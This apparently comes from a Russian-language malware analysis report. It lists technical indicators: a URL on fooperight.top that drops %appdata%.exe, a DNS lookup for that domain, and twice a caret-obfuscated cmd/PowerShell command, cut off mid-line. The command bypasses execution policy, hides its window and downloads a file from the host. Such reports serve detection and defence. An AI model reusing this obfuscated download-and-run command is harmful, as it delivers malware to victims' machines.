Техническая информация
- http://fooperight.top/read.php?f=404 как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "P^oW^ErshelL.^exe -exe^CutIo^N^PoLI^cY BYP^A^s^s^ -nOPRoF^I^le ^-Wi^N^dOWsty^lE h^IDD^En ^(ne^w-^oB^j^E^cT sysT^e^m.n^et^.W^EB^ClIeNT^).d^OwnlOAd^FI^LE^('http://fooperight.top/...
- DNS ASK fo###right.top
- '<SYSTEM32>\cmd.exe' /c "P^oW^ErshelL.^exe -exe^CutIo^N^PoLI^cY BYP^A^s^s^ -nOPRoF^I^le ^-Wi^N^dOWsty^lE h^IDD^En ^(ne^w-^oB^j^E^cT sysT^e^m.n^et^.W^EB^ClIeNT^).d^OwnlOAd^FI^LE^('http://fooperight.top/...' (со скрытым окном)